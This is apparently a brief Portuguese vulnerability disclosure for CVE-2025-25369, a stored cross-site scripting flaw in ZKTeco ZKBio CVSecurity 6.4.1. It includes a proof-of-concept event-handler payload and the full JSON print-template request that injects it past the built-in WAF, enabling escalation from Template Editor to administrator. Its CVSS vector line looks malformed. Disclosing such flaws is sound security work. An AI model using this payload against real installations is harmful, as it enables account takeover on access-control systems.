
Exploit XSS documentado para ZKBio CVSecurity v.6.4.1 com bypass de WAF, permitindo escalonamento de privilégios de Template Editor para administrador por meio de modelos de impressão elaborados.
CVE-2025-25369: Vulnerabilidade de Cross Site Scripting no ZKTeco ZKBio CVSecurity v.6.4.1
Uma vulnerabilidade de XSS foi descoberta no ZKBio CVSecurity v.6.4.1.
Um atacante poderia explorar esta vulnerabilidade com privilégios de Template Editor e escalar seus privilégios para administrador.
Também foi implementada uma bypass do WAF integrado.
Isso pode levar ao comprometimento total do sistema.
Pontuação CVSS: 4.3 (Baixa)
Vetor: CVSS:4.3 AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L
Componente Afetado:
Vetores de Ataque:
Payload:
onpointerdown="prompt(8)"
Todos os dados da requisição:
[{"printType":""background","width":318,"height":505,"printValue":"/upload/pers/101010101.txt"","direction":"1"},{"cell":"printData.person.pin","leftPoint":"77px","topPoint":"323px","width":117,"height":20,"printType":"text","style":"draggable" onpointerdown="prompt(8)" ui-draggable","color":"0, 0, 0","fontSize":"18px","align":"start","fontFamily":""Arial"","printValue":"pers_person_pin","direction":"1"}]

